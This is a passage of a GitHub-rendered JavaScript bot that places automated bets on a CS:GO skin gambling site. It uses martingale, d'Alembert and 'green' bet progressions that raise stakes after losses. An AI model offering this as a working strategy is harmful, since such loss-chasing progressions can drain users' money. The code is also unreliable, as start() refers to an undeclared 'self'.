id=\"file-csgodouble-automatic-betting-bot-LC489\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.play = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L490\" class=\"blob-num js-line-number\" data-line-number=\"490\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC490\" class=\"blob-code blob-code-inner js-file-line\"> var self = this;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L491\" class=\"blob-num js-line-number\" data-line-number=\"491\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC491\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L492\" class=\"blob-num js-line-number\" data-line-number=\"492\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC492\" class=\"blob-code blob-code-inner js-file-line\"> if (this.game !== null) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L493\" class=\"blob-num js-line-number\" data-line-number=\"493\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC493\" class=\"blob-code blob-code-inner js-file-line\"> if (this.debug) { this.logdebug(&#39;Tried to reinitialize running game!&#39;); }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L494\" class=\"blob-num js-line-number\" data-line-number=\"494\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC494\" class=\"blob-code blob-code-inner js-file-line\"> return false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L495\" class=\"blob-num js-line-number\" data-line-number=\"495\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC495\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L496\" class=\"blob-num js-line-number\" data-line-number=\"496\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC496\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L497\" class=\"blob-num js-line-number\" data-line-number=\"497\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC497\" class=\"blob-code blob-code-inner js-file-line\"> this.game = setInterval(function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L498\" class=\"blob-num js-line-number\" data-line-number=\"498\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC498\" class=\"blob-code blob-code-inner js-file-line\"> var history = self.history;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L499\" class=\"blob-num js-line-number\" data-line-number=\"499\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC499\" class=\"blob-code blob-code-inner js-file-line\"> if (!self.waiting_for_bet &amp;&amp; self.updateAll() &amp;&amp; !history.equals(self.history)) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L500\" class=\"blob-num js-line-number\" data-line-number=\"500\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC500\" class=\"blob-code blob-code-inner js-file-line\"> self.waiting_for_bet = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L501\" class=\"blob-num js-line-number\" data-line-number=\"501\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC501\" class=\"blob-code blob-code-inner js-file-line\"> if (self.last_color === null) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L502\" class=\"blob-num js-line-number\" data-line-number=\"502\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC502\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(self.base_bet);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L503\" class=\"blob-num js-line-number\" data-line-number=\"503\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC503\" class=\"blob-code blob-code-inner js-file-line\"> } else if (self.last_color === self.history[self.history.length - 1]) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L504\" class=\"blob-num js-line-number\" data-line-number=\"504\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC504\" class=\"blob-code blob-code-inner js-file-line\"> if (self.calculate_safe_bet) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L505\" class=\"blob-num js-line-number\" data-line-number=\"505\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC505\" class=\"blob-code blob-code-inner js-file-line\"> self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L506\" class=\"blob-num js-line-number\" data-line-number=\"506\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC506\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.basebet.value = self.base_bet;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L507\" class=\"blob-num js-line-number\" data-line-number=\"507\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC507\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L508\" class=\"blob-num js-line-number\" data-line-number=\"508\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC508\" class=\"blob-code blob-code-inner js-file-line\"> self.last_result = &#39;win&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L509\" class=\"blob-num js-line-number\" data-line-number=\"509\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC509\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Win!&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L510\" class=\"blob-num js-line-number\" data-line-number=\"510\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC510\" class=\"blob-code blob-code-inner js-file-line\"> self.stats.wins += 1;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L511\" class=\"blob-num js-line-number\" data-line-number=\"511\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC511\" class=\"blob-code blob-code-inner js-file-line\"> self.old_base = self.base_bet;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L512\" class=\"blob-num js-line-number\" data-line-number=\"512\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC512\" class=\"blob-code blob-code-inner js-file-line\"> self.old_method = self.method;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L513\" class=\"blob-num js-line-number\" data-line-number=\"513\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC513\" class=\"blob-code blob-code-inner js-file-line\"> if (self.old_method === &#39;dalembert&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L514\" class=\"blob-num js-line-number\" data-line-number=\"514\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC514\" class=\"blob-code blob-code-inner js-file-line\"> if (self.last_bet &gt; self.old_base) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L515\" class=\"blob-num js-line-number\" data-line-number=\"515\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC515\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(self.last_bet - 1);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L516\" class=\"blob-num js-line-number\" data-line-number=\"516\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC516\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L517\" class=\"blob-num js-line-number\" data-line-number=\"517\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC517\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(self.base_bet);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L518\" class=\"blob-num js-line-number\" data-line-number=\"518\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC518\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L519\" class=\"blob-num js-line-number\" data-line-number=\"519\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC519\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L520\" class=\"blob-num js-line-number\" data-line-number=\"520\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC520\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(self.base_bet);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L521\" class=\"blob-num js-line-number\" data-line-number=\"521\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC521\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L522\" class=\"blob-num js-line-number\" data-line-number=\"522\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC522\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L523\" class=\"blob-num js-line-number\" data-line-number=\"523\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC523\" class=\"blob-code blob-code-inner js-file-line\"> self.last_result = &#39;lose&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L524\" class=\"blob-num js-line-number\" data-line-number=\"524\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC524\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Lose!&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L525\" class=\"blob-num js-line-number\" data-line-number=\"525\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC525\" class=\"blob-code blob-code-inner js-file-line\"> self.stats.loses += 1;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L526\" class=\"blob-num js-line-number\" data-line-number=\"526\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC526\" class=\"blob-code blob-code-inner js-file-line\"> if (self.old_method === &#39;martingale&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L527\" class=\"blob-num js-line-number\" data-line-number=\"527\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC527\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(self.last_bet * 2);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L528\" class=\"blob-num js-line-number\" data-line-number=\"528\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC528\" class=\"blob-code blob-code-inner js-file-line\"> } else if (self.old_method === &#39;great martingale&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L529\" class=\"blob-num js-line-number\" data-line-number=\"529\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC529\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(self.last_bet * 2 + self.old_base);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L530\" class=\"blob-num js-line-number\" data-line-number=\"530\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC530\" class=\"blob-code blob-code-inner js-file-line\"> } else if (self.old_method === &#39;green&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L531\" class=\"blob-num js-line-number\" data-line-number=\"531\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC531\" class=\"blob-code blob-code-inner js-file-line\"> var bet_value = 0;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L532\" class=\"blob-num js-line-number\" data-line-number=\"532\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC532\" class=\"blob-code blob-code-inner js-file-line\"> if (self.bet_history[self.bet_history.length - 1] === 1) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L533\" class=\"blob-num js-line-number\" data-line-number=\"533\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC533\" class=\"blob-code blob-code-inner js-file-line\"> if (self.bet_history[self.bet_history.length - 2] === 1) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L534\" class=\"blob-num js-line-number\" data-line-number=\"534\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC534\" class=\"blob-code blob-code-inner js-file-line\"> bet_value = 2;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L535\" class=\"blob-num js-line-number\" data-line-number=\"535\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC535\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L536\" class=\"blob-num js-line-number\" data-line-number=\"536\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC536\" class=\"blob-code blob-code-inner js-file-line\"> bet_value = 1;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L537\" class=\"blob-num js-line-number\" data-line-number=\"537\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC537\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L538\" class=\"blob-num js-line-number\" data-line-number=\"538\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC538\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L539\" class=\"blob-num js-line-number\" data-line-number=\"539\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC539\" class=\"blob-code blob-code-inner js-file-line\"> bet_value = self.bet_history[self.bet_history.length - 1] + self.bet_history[self.bet_history.length - 2];<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L540\" class=\"blob-num js-line-number\" data-line-number=\"540\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC540\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L541\" class=\"blob-num js-line-number\" data-line-number=\"541\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC541\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(bet_value, &#39;green&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L542\" class=\"blob-num js-line-number\" data-line-number=\"542\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC542\" class=\"blob-code blob-code-inner js-file-line\"> } else if (self.old_method === &#39;dalembert&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L543\" class=\"blob-num js-line-number\" data-line-number=\"543\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC543\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(self.last_bet + 1);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L544\" class=\"blob-num js-line-number\" data-line-number=\"544\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC544\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L545\" class=\"blob-num js-line-number\" data-line-number=\"545\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC545\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L546\" class=\"blob-num js-line-number\" data-line-number=\"546\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC546\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L547\" class=\"blob-num js-line-number\" data-line-number=\"547\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC547\" class=\"blob-code blob-code-inner js-file-line\"> }, 2 * 1000);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L548\" class=\"blob-num js-line-number\" data-line-number=\"548\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC548\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L549\" class=\"blob-num js-line-number\" data-line-number=\"549\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC549\" class=\"blob-code blob-code-inner js-file-line\"> return true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L550\" class=\"blob-num js-line-number\" data-line-number=\"550\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC550\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L551\" class=\"blob-num js-line-number\" data-line-number=\"551\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC551\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L552\" class=\"blob-num js-line-number\" data-line-number=\"552\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC552\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.start = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L553\" class=\"blob-num js-line-number\" data-line-number=\"553\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC553\" class=\"blob-code blob-code-inner js-file-line\"> if (self.calculate_safe_bet) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L554\" class=\"blob-num js-line-number\" data-line-number=\"554\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC554\" class=\"blob-code blob-code-inner js-file-line\"> self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L555\" class=\"blob-num js-line-number\" data-line-number=\"555\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC555\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.basebet.value = self.base_bet;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L556\" class=\"blob-num js-line-number\" data-line-number=\"556\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC556\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L557\" class=\"blob-num js-line-number\" data-line-number=\"557\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC557\" class=\"blob-code blob-code-inner js-file-line\"> this.old_base = this.base_bet;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L558\" class=\"blob-num js-line-number\" data-line-number=\"558\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC558\" class=\"blob-code blob-code-inner js-file-line\"> this.old_method = this.method;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L559\" class=\"blob-num js-line-number\" data-line-number=\"559\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC559\" class=\"blob-code blob-code-inner js-file-line\"> if (this.updateAll()) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L560\" class=\"blob-num js-line-number\" data-line-number=\"560\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC560\" class=\"blob-code blob-code-inner js-file-line\"> if (this.last_result === &#39;lose&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L561\" class=\"blob-num js-line-number\" data-line-number=\"561\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC561\" class=\"blob-code blob-code-inner js-file-line\"> this.running = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L562\" class=\"blob-num js-line-number\" data-line-number=\"562\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC562\" class=\"blob-code blob-code-inner js-file-line\"> if (this.old_method === &#39;martingale&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L563\" class=\"blob-num js-line-number\" data-line-number=\"563\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC563\" class=\"blob-code blob-code-inner js-file-line\"> this.bet(this.last_bet * 2);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L564\" class=\"blob-num js-line-number\" data-line-number=\"564\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC564\" class=\"blob-code blob-code-inner js-file-line\"> } else if (this.old_method === &#39;great martingale&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L565\" class=\"blob-num js-line-number\" data-line-number=\"565\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC565\" class=\"blob-code blob-code-inner js-file-line\"> this.bet(this.last_bet * 2 + this.old_base);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L566\" class=\"blob-num js-line-number\" data-line-number=\"566\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC566\" class=\"blob-code blob-code-inner js-file-line\"> } else if (self.old_method === &#39;green&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L567\" class=\"blob-num js-line-number\" data-line-number=\"567\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC567\" class=\"blob-code blob-code-inner js-file-line\"> var bet_value = 0;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L568\" class=\"blob-num js-line-number\" data-line-number=\"568\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC568\" class=\"blob-code blob-code-inner js-file-line\"> if (self.bet_history[self.bet_history.length - 1] === 1) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L569\" class=\"blob-num js-line-number\" data-line-number=\"569\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC569\" class=\"blob-code blob-code-inner js-file-line\"> if (self.bet_history[self.bet_history.length - 2] === 1) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L570\" class=\"blob-num js-line-number\" data-line-number=\"570\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC570\" class=\"blob-code blob-code-inner js-file-line\"> bet_value = 2;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L571\" class=\"blob-num js-line-number\" data-line-number=\"571\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC571\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L572\" class=\"blob-num js-line-number\" data-line-number=\"572\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC572\" class=\"blob-code blob-code-inner js-file-line\"> bet_value = 1;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L573\" class=\"blob-num js-line-number\" data-line-number=\"573\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC573\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L574\" class=\"blob-num js-line-number\" data-line-number=\"574\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC574\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L575\" class=\"blob-num js-line-number\" data-line-number=\"575\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC575\" class=\"blob-code blob-code-inner js-file-line\"> bet_value = self.bet_history[self.bet_history.length - 1] + self.bet_history[self.bet_history.length - 2];<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L576\" class=\"blob-num js-line-number\" data-line-number=\"576\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC576\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L577\" class=\"blob-num js-line-number\" data-line-number=\"577\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC577\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(bet_value, &#39;green&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L578\" class=\"blob-num js-line-number\" data-line-number=\"578\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC578\" class=\"blob-code blob-code-inner js-file-line\"> } else if (self.old_method === &#39;dalembert&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L579\" class=\"blob-num js-line-number\" data-line-number=\"579\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC579\" class=\"blob-code blob-code-inner js-file-line\"> self.bet(self.last_bet + 1);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L580\" class=\"blob-num js-line-number\" data-line-number=\"580\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC580\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L581\" class=\"blob-num js-line-number\" data-line-number=\"581\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC581\" class=\"blob-code blob-code-inner js-file-line\"> this.play();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L582\" class=\"blob-num js-line-number\" data-line-number=\"582\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC582\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L583\" class=\"blob-num js-line-number\" data-line-number=\"583\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC583\" class=\"blob-code blob-code-inner js-file-line\"> this.running = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L584\" class=\"blob-num js-line-number\" data-line-number=\"584\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC584\" class=\"blob-code blob-code-inner js-file-line\"> this.bet(this.base_bet);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L585\" class=\"blob-num js-line-number\" data-line-number=\"585\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC585\" class=\"blob-code blob-code-inner js-file-line\"> this.play();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L586\" class=\"blob-num js-line-number\" data-line-number=\"586\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC586\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L587\" class=\"blob-num js-line-number\" data-line-number=\"587\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC587\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L588\" class=\"blob-num js-line-number\" data-line-number=\"588\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC588\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.abort.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L589\" class=\"blob-num js-line-number\" data-line-number=\"589\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC589\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.stop.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L590\" class=\"blob-num js-line-number\" data-line-number=\"590\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC590\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.start.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L591\" class=\"blob-num js-line-number\" data-line-number=\"591\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC591\" class=\"blob-code 